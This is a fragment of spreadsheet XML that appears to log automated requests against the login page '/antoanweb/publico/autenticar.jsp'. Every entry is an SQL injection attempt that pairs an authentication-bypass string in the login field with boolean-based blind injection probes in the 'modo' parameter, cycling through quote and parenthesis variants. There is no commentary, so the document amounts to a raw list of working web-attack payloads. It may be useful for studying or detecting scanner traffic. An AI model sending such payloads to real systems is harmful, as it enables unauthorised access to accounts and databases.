    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and3516=8407and'dclu'='dclu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and8616=172and('bnkb'like'bnkb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and144=144and('cfii'like'cfii</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and7382=5635and('sjme'like'sjme</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and597=9969and(('tntc'like'tntc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and144=144and(('dbip'like'dbip</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and6712=9595and(('daqg'like'daqg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and5532=5628and((('iehq'like'iehq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and144=144and((('ydku'like'ydku</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and7383=136and((('dkvd'like'dkvd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and4424=9064and'zodj'like'zodj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and144=144and'pwve'like'pwve</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and4653=3859and'navq'like'navq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and2858=195and("tdvi"="tdvi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and144=144and("gutj"="gutj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and8276=9096and("ythh"="ythh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and6747=5329and(("wdsx"="wdsx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and144=144and(("xzme"="xzme</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and7206=3397and(("ikgl"="ikgl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and450=3910and((("peil"="peil</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and144=144and((("nsqd"="nsqd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and2747=9767and((("nftx"="nftx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and4855=4766and"phdg"="phdg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and144=144and"djwo"="djwo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and3852=5423and"poee"="poee</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and564=6489and("wpea"like"wpea</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and144=144and("vpnw"like"vpnw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and9235=3144and("ewnf"like"ewnf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and3276=6744and(("prwu"like"prwu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and144=144and(("eedz"like"eedz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and3163=8708and(("acfz"like"acfz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and2308=2072and((("xwpj"like"xwpj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and144=144and((("dhat"like"dhat</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and7682=4358and((("goys"like"goys</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and7835=487and"ctkg"like"ctkg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and144=144and"wlnj"like"wlnj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and8112=585and"olyf"like"olyf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and9201=4703--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and2415=2415--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and8957=8678--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and1320=3807--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and2415=2415--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and1922=1778--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and758=5152--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and2415=2415--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and6411=6418--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and5151=1474--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and2415=2415--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and9155=6827--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and1948=447--and(8166=8166</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and2415=2415--and(2875=2875</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)and8005=3680--and(5411=5411</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))and1676=9366--and((5431=5431</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))and2415=2415--and((6338=6338</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar))and3273=512--and((9504=9504</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))and4971=1828--and(((7551=7551</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))and2415=2415--and(((8002=8002</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))and7021=6770--and(((3552=3552</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarand4217=6061--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarand2415=2415--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarand2381=6224--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and5265=5226--and('yotz'='yotz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and2415=2415--and('vvio'='vvio</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and3601=2589--and('xtha'='xtha</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and7299=3630--and(('stmj'='stmj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and2415=2415--and(('tgpy'='tgpy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and1103=5499--and(('ilrg'='ilrg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and2627=6218--and((('xypj'='xypj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and2415=2415--and((('gula'='gula</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and2460=9264--and((('xiqx'='xiqx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and6695=911--and'aics'='aics</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and2415=2415--and'pdhc'='pdhc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and1628=7287--and'yhuv'='yhuv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and1277=525--and('lgyc'like'lgyc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and2415=2415--and('pcaw'like'pcaw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')and5187=3957--and('psrp'like'psrp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and9638=8504--and(('vlhe'like'vlhe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and2415=2415--and(('rowe'like'rowe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))and1638=3924--and(('oesg'like'oesg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and3989=9508--and((('onea'like'onea</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and2415=2415--and((('ezju'like'ezju</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))and6979=9995--and((('fpis'like'fpis</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and8307=615--and'exay'like'exay</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and2415=2415--and'tvxd'like'tvxd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'and3234=7119--and'noyr'like'noyr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and1485=5517--and("fbrg"="fbrg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and2415=2415--and("btmi"="btmi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and9050=5998--and("wowd"="wowd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and935=2560--and(("ywmx"="ywmx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and2415=2415--and(("wjdn"="wjdn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and9148=372--and(("wzhf"="wzhf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and447=2614--and((("tuwd"="tuwd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and2415=2415--and((("tmlt"="tmlt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and81=8986--and((("ddwh"="ddwh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and3415=9079--and"yrlp"="yrlp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and2415=2415--and"nktn"="nktn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and2461=3825--and"svnf"="svnf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and2320=1883--and("bpxy"like"bpxy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and2415=2415--and("hgdx"like"hgdx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")and9972=7685--and("exgb"like"exgb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and1201=7922--and(("dunh"like"dunh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and2415=2415--and(("knll"like"knll</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"))and8878=1310--and(("fmzd"like"fmzd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and8332=9201--and((("mwqo"like"mwqo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and2415=2415--and((("etag"like"etag</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar")))and4581=4759--and((("fywz"like"fywz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and6246=8186--and"ncdp"like"ncdp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and2415=2415--and"xgna"like"xgna</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar"and6483=7555--and"aomt"like"aomt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1667</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-632)ornot(3925=2913)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7299)ornot(2685=2685)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-22)ornot(9849=9164)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5404</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9678')ornot(8300=5043)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4785')ornot(2685=2685)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2085')ornot(8729=4195)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2480</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9388'ornot(9561=5361)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2609'ornot(2685=2685)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-133'ornot(3222=6115)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7335</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-83"ornot(6487=9709)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3232"ornot(2685=2685)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8667"ornot(5771=5945)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4093</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-329)ornot(4785=61)and(3373=3373</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3542)ornot(2685=2685)and(286=286</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9730)ornot(5114=160)and(964=964</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7912</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7601))ornot(5301=8156)and((290=290</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1535))ornot(2685=2685)and((8740=8740</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6815))ornot(2739=6804)and((3496=3496</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7256</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2789)))ornot(9551=2407)and(((116=116</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-110)))ornot(2685=2685)and(((375=375</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1082)))ornot(4791=5404)and(((1121=1121</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7496</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7348ornot(6809=117)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3866ornot(2685=2685)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6855ornot(9307=9515)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7161</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6618')ornot(6810=2060)and('canb'='canb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5497')ornot(2685=2685)and('ikma'='ikma</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2499')ornot(6384=8616)and('haxe'='haxe</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1860</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4378'))ornot(8462=7212)and(('pqyy'='pqyy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5033'))ornot(2685=2685)and(('kgys'='kgys</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3135'))ornot(6391=6509)and(('rezw'='rezw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8851</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5232')))ornot(5434=3757)and((('xnwr'='xnwr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4929')))ornot(2685=2685)and((('yypu'='yypu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9831')))ornot(2740=5378)and((('dzpw'='dzpw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2799</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6378'ornot(4453=2852)and'edht'='edht</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3720'ornot(2685=2685)and'lhfk'='lhfk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-884'ornot(4807=5035)and'thcp'='thcp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2562</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-968')ornot(9799=2223)and('gjvr'like'gjvr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-539')ornot(2685=2685)and('kfdl'like'kfdl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2703')ornot(4642=8795)and('vsoz'like'vsoz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2576</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1576'))ornot(3129=2235)and(('aeri'like'aeri</t>
  </si>
  <si>
